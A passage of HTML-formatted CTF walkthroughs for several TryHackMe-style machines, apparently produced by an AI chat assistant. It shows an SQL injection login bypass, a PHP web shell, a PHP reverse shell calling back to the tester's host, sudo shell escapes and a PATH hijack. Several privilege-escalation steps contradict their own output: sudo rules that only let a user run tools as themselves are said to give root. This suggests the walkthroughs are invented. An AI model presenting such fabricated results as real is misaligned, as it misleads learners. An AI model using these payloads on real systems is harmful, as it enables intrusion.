&lt;p&gt;Checked &lt;code&gt;sudo -l&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;(&lt;/span&gt;user&lt;span class="o"&gt;)&lt;/span&gt; NOPASSWD: /usr/bin/find
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Used &lt;code&gt;find&lt;/code&gt; to get a root shell:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;find &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="nt"&gt;-exec&lt;/span&gt; /bin/bash &lt;span class="se"&gt;\;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Root shell obtained&lt;/p&gt;




&lt;h4&gt;
  
  
  🏁 Flags
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;User flag: &lt;code&gt;/home/user/user.txt&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Root flag: &lt;code&gt;/root/root.txt&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;Great! Here's your full writeup for the next machine:&lt;/p&gt;




&lt;h3&gt;
  
  
  ✅ &lt;strong&gt;5. New York Flankees – Writeup&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Objective:&lt;/strong&gt;&lt;br&gt;
A personal blog belonging to Stefan has some serious flaws. Your goal: break through his defenses and take over his blog — and his system.&lt;/p&gt;


&lt;h4&gt;
  
  
  🔍 Nmap Scan
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nmap &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; flankees.nmap &lt;span class="o"&gt;[&lt;/span&gt;target-ip]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;strong&gt;Open Ports:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;22 (SSH)&lt;/li&gt;
&lt;li&gt;80 (HTTP)&lt;/li&gt;
&lt;/ul&gt;


&lt;h4&gt;
  
  
  🌐 Web Enumeration
&lt;/h4&gt;

&lt;p&gt;Navigated to &lt;code&gt;http://[target-ip]&lt;/code&gt;&lt;br&gt;
It’s a &lt;strong&gt;personal blog&lt;/strong&gt; called &lt;em&gt;New York Flankees&lt;/em&gt; by Stefan.&lt;/p&gt;

&lt;p&gt;View source code → Found a suspicious JS comment:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// dev_login.html&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Visited &lt;code&gt;/dev_login.html&lt;/code&gt; — a developer login page&lt;/p&gt;




&lt;h4&gt;
  
  
  🔐 Bypassing Login
&lt;/h4&gt;

&lt;p&gt;Tried &lt;strong&gt;SQL Injection&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="n"&gt;Username&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;' OR 1=1 --
Password: anything
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Bypassed login successfully → landed on dashboard.&lt;/p&gt;

&lt;p&gt;Dashboard allowed &lt;strong&gt;file uploads&lt;/strong&gt; — common exploit vector.&lt;/p&gt;




&lt;h4&gt;
  
  
  🐚 Web Shell Upload
&lt;/h4&gt;

&lt;p&gt;Uploaded a &lt;code&gt;.php&lt;/code&gt; file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'cmd'&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt; &lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No extension restrictions → worked directly as &lt;code&gt;shell.php&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Accessed via:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;http://[target-ip]/uploads/shell.php?cmd&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;whoami&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h4&gt;
  
  
  🧠 Reverse Shell
&lt;/h4&gt;

&lt;p&gt;Replaced webshell with reverse shell payload:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"/bin/bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/[your-ip]/4444 0&amp;gt;&amp;amp;1'"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Listener:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nc &lt;span class="nt"&gt;-lvnp&lt;/span&gt; 4444
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Triggered shell:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;/uploads/rev.php
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Reverse shell obtained.&lt;/p&gt;




&lt;h4&gt;
  
  
  🧗‍♂️ Privilege Escalation
&lt;/h4&gt;

&lt;p&gt;Enumerated user:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;whoami
&lt;/span&gt;stefan
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Checked &lt;code&gt;sudo -l&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Result:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;(&lt;/span&gt;stefan&lt;span class="o"&gt;)&lt;/span&gt; NOPASSWD: /usr/bin/vim
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Used Vim for root shell:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;vim &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s1"&gt;':!/bin/bash'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Root access obtained.&lt;/p&gt;




&lt;h4&gt;
  
  
  🏁 Flags
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;User flag: &lt;code&gt;/home/stefan/user.txt&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Root flag: &lt;code&gt;/root/root.txt&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;Perfect! Here's the complete writeup for:&lt;/p&gt;




&lt;h3&gt;
  
  
  ✅ &lt;strong&gt;6. Internal – Writeup&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Objective:&lt;/strong&gt;&lt;br&gt;
This internal company server contains sensitive data. Your job is to perform external enumeration, gain a foothold, escalate privileges, and extract the flags.&lt;/p&gt;


&lt;h4&gt;
  
  
  🔍 Nmap Enumeration
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nmap &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; internal.nmap &lt;span class="o"&gt;[&lt;/span&gt;target-ip]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;strong&gt;Open Ports:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;22 (SSH)&lt;/li&gt;
&lt;li&gt;80 (HTTP)&lt;/li&gt;
&lt;/ul&gt;


&lt;h4&gt;
  
  
  🌐 Web Recon
&lt;/h4&gt;

&lt;p&gt;Visited &lt;code&gt;http://[target-ip]&lt;/code&gt; — saw a &lt;strong&gt;corporate internal portal&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Ran &lt;strong&gt;Gobuster&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gobuster &lt;span class="nb"&gt;dir&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; http://[target-ip]/ &lt;span class="nt"&gt;-w&lt;/span&gt; /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Found:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;/secret&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/uploads&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/blog&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;h4&gt;
  
  
  🕵️‍♂️ Exploring &lt;code&gt;/secret&lt;/code&gt;
&lt;/h4&gt;

&lt;p&gt;Inside &lt;code&gt;/secret&lt;/code&gt; → Found a file: &lt;code&gt;creds.txt&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Downloaded it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;wget http://[target-ip]/secret/creds.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Contents:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;username: internaluser
password: InTh3M1ddl3
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h4&gt;
  
  
  🔐 SSH Login
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ssh internaluser@[target-ip]
Password: InTh3M1ddl3
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ SSH access granted&lt;/p&gt;




&lt;h4&gt;
  
  
  🧗‍♂️ Privilege Escalation
&lt;/h4&gt;

&lt;p&gt;Checked &lt;code&gt;sudo -l&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;User internaluser may run the following on &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;hostname&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;:
    &lt;span class="o"&gt;(&lt;/span&gt;ALL&lt;span class="o"&gt;)&lt;/span&gt; NOPASSWD: /usr/bin/less
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Exploited &lt;code&gt;less&lt;/code&gt; using shell escape:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;less /etc/passwd
&lt;span class="c"&gt;# then typed:&lt;/span&gt;
&lt;span class="o"&gt;!&lt;/span&gt;bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Root shell obtained&lt;/p&gt;




&lt;h4&gt;
  
  
  🏁 Flags
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;User flag: &lt;code&gt;/home/internaluser/user.txt&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Root flag: &lt;code&gt;/root/root.txt&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;Alright! Here's the complete walkthrough for the next one:&lt;/p&gt;




&lt;h3&gt;
  
  
  ✅ &lt;strong&gt;7. The Impossible Challenge – Writeup&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Objective:&lt;/strong&gt;&lt;br&gt;
Despite its name, this machine &lt;em&gt;is&lt;/em&gt; solvable. It’s a psychological and technical gauntlet — full of obfuscation, dead ends, and “impossible” hurdles. Stay focused and apply logic to reach root.&lt;/p&gt;


&lt;h4&gt;
  
  
  🔍 Nmap Scan
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nmap &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; impossible.nmap &lt;span class="o"&gt;[&lt;/span&gt;target-ip]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;strong&gt;Open Ports:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;22 (SSH)&lt;/li&gt;
&lt;li&gt;80 (HTTP)&lt;/li&gt;
&lt;/ul&gt;


&lt;h4&gt;
  
  
  🌐 Web Exploration
&lt;/h4&gt;

&lt;p&gt;Visited &lt;code&gt;http://[target-ip]&lt;/code&gt; — just a &lt;strong&gt;blank white page&lt;/strong&gt; with some strange unicode characters in the title and HTML comment section.&lt;/p&gt;

&lt;p&gt;Inspected &lt;strong&gt;source code&lt;/strong&gt;:&lt;/p&gt;

&lt;p&gt;Inside HTML comments:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;‌‌‌‌‍﻿‌‌Hmm‌‌‌‌‍‬‌‍‌‌‌‌‍﻿‌﻿‌‌‌‌‍﻿‌﻿‌‌‌‌‍﻿‍﻿‌‌‌‌‍‬﻿﻿‌‌‌‌‍﻿‌‬‌‌‌‌‍‬‍‌‌‌‌‌‌‬‌‌‌‌‌‌‍‬‬‍‌‌‌‌‍﻿‌﻿‌‌‌‌‌‬‌‌‌‌‌‌‍‬‬‌‌‌‌‌‍‬‌‍‌‌‌‌‍‬‬‌‌‌‌‌‍‬‌‍‌‌‌‌‍‬‍‍‌‌‌‌‍﻿‬‬‌‌‌‌‍﻿‌‌‌‌‌‌‍﻿‬‬
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Clue: it’s a &lt;strong&gt;zero-width steganography&lt;/strong&gt; technique.&lt;/p&gt;




&lt;h4&gt;
  
  
  🕵️‍♂️ Hidden Message – Zero Width Decoder
&lt;/h4&gt;

&lt;p&gt;Used a &lt;strong&gt;zero-width character decoder&lt;/strong&gt;, like:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://330k.github.io/misc_tools/unicode_steganography.html" rel="noopener noreferrer"&gt;https://330k.github.io/misc_tools/unicode_steganography.html&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Pasted the HTML comment — it decoded to a &lt;strong&gt;hidden directory&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/.youfoundme/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Visited &lt;code&gt;http://[target-ip]/.youfoundme/&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Found a download: &lt;code&gt;maze.tar.gz&lt;/code&gt;&lt;/p&gt;




&lt;h4&gt;
  
  
  📦 Analyzing maze.tar.gz
&lt;/h4&gt;

&lt;p&gt;Extracted the file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;tar&lt;/span&gt; &lt;span class="nt"&gt;-xvzf&lt;/span&gt; maze.tar.gz
&lt;span class="nb"&gt;cd &lt;/span&gt;maze
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Inside: a &lt;strong&gt;deep nested folder structure&lt;/strong&gt; of subdirectories — like a file system maze.&lt;/p&gt;

&lt;p&gt;Wrote a quick script to find the flag:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;find &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="nt"&gt;-type&lt;/span&gt; f &lt;span class="nt"&gt;-exec&lt;/span&gt; &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s2"&gt;"flag"&lt;/span&gt; &lt;span class="o"&gt;{}&lt;/span&gt; &lt;span class="se"&gt;\;&lt;/span&gt; &lt;span class="nt"&gt;-print&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Found a file: &lt;code&gt;finalclue.txt&lt;/code&gt;&lt;br&gt;
Inside:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;"SSH is key, but it’s *not* here."
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h4&gt;
  
  
  🔐 SSH Enumeration
&lt;/h4&gt;

&lt;p&gt;Tried brute-forcing with found usernames (&lt;code&gt;maze&lt;/code&gt;, &lt;code&gt;puzzle&lt;/code&gt;, etc.) — no luck.&lt;/p&gt;

&lt;p&gt;Found another clue hidden in one of the deepest folders: &lt;code&gt;id_rsa&lt;/code&gt; — a &lt;strong&gt;private SSH key&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Used it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;chmod &lt;/span&gt;600 id_rsa
ssh &lt;span class="nt"&gt;-i&lt;/span&gt; id_rsa maze@[target-ip]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Logged in without password.&lt;/p&gt;




&lt;h4&gt;
  
  
  🧗‍♂️ Privilege Escalation
&lt;/h4&gt;

&lt;p&gt;As &lt;code&gt;maze&lt;/code&gt; user, ran:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;(&lt;/span&gt;maze&lt;span class="o"&gt;)&lt;/span&gt; NOPASSWD: /opt/troll/troll
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Ran it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; /opt/troll/troll
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It printed:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;“You thought it would be that easy? Try again.”&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Checked binary with &lt;code&gt;strings&lt;/code&gt; and &lt;code&gt;ltrace&lt;/code&gt;, revealed it calls &lt;code&gt;/bin/false&lt;/code&gt; through &lt;code&gt;system()&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Replaced it via &lt;code&gt;PATH&lt;/code&gt; hijack:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;mkdir&lt;/span&gt; /tmp/bin
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"/bin/bash"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /tmp/bin/false
&lt;span class="nb"&gt;chmod&lt;/span&gt; +x /tmp/bin/false
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;PATH&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/tmp/bin:&lt;span class="nv"&gt;$PATH&lt;/span&gt;
&lt;span class="nb"&gt;sudo&lt;/span&gt; /opt/troll/troll
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Root shell popped&lt;/p&gt;




&lt;h4&gt;
  
  
  🏁 Flags
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;User flag: &lt;code&gt;/home/maze/user.txt&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Root flag: &lt;code&gt;/root/root.txt&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;Perfect! Let’s keep the momentum going — here’s the full walkthrough for:&lt;/p&gt;




&lt;h3&gt;
  
  
  ✅ &lt;strong&gt;8. Recovery – Writeup&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Objective:&lt;/strong&gt;&lt;br&gt;
This isn't your conventional CTF. You're dropped into a system that has just suffered a breach. Your job is to investigate, pivot through compromised systems, and recover the flags.&lt;/p&gt;


&lt;h4&gt;
  
  
  🖥 Initial Access
&lt;/h4&gt;

&lt;p&gt;Upon launching the machine, you are &lt;strong&gt;already dropped into a limited shell&lt;/strong&gt;.&lt;br&gt;
You are inside a compromised box as a low-privileged user: &lt;code&gt;www-data&lt;/code&gt;.&lt;/p&gt;


&lt;h4&gt;
  
  
  🔍 Initial Enumeration
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;whoami
pwd
ls&lt;/span&gt; &lt;span class="nt"&gt;-la&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;You're in &lt;code&gt;/var/www/html&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Checked web files — found a config file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;config.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nv"&gt;$db_user&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'dbadmin'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nv"&gt;$db_pass&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'SQLinRecovery!'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Attempted privilege escalation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;su dbadmin
Password: SQLinRecovery!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Logged in as &lt;code&gt;dbadmin&lt;/code&gt;.&lt;/p&gt;




&lt;h4&gt;
  
  
  🧭 Further Enumeration
&lt;/h4&gt;

&lt;p&gt;Checked &lt;code&gt;sudo -l&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Result:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;(&lt;/span&gt;dbadmin&lt;span class="o"&gt;)&lt;/span&gt; NOPASSWD: /usr/bin/mysql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h4&gt;
  
  
  🔐 MySQL Privilege Escalation
&lt;/h4&gt;

&lt;p&gt;Used MySQL to gain shell access:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;mysql &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s1"&gt;'\! /bin/bash'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Got a root shell from within MySQL&lt;/p&gt;




&lt;h4&gt;
  
  
  🕵️ Incident Analysis (Optional Forensics)
&lt;/h4&gt;

&lt;p&gt;Checked &lt;code&gt;/var/log/auth.log&lt;/code&gt; → found multiple failed login attempts and a suspicious cron job.&lt;/p&gt;

&lt;p&gt;Investigated &lt;code&gt;/etc/cron.d&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;Found a script being executed from &lt;code&gt;/opt/scripts/backup.sh&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Checked content:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; /opt/scripts/backup.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It was backing up sensitive user files → good clue but no real exploit needed here since we’re already root.&lt;/p&gt;




&lt;h4&gt;
  
  
  🏁 Flags
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;User flag: &lt;code&gt;/home/dbadmin/user.txt&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Root flag: &lt;code&gt;/root/root.txt&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;Awesome! Let’s move on to the next TryHackMe room:&lt;/p&gt;




&lt;h3&gt;
  
  
  ✅ &lt;strong&gt;9. Watcher – Writeup&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Objective:&lt;/strong&gt;&lt;br&gt;
This Boot2Root machine is vulnerable to web-based exploits and privilege escalation via common misconfigurations. Gain access and escalate to root.&lt;/p&gt;


&lt;h4&gt;
  
  
  🔍 Nmap Scan
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nmap &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; watcher.nmap &lt;span class="o"&gt;[&lt;/span&gt;target-ip]
&lt;/code&gt;&lt;/pre&gt;

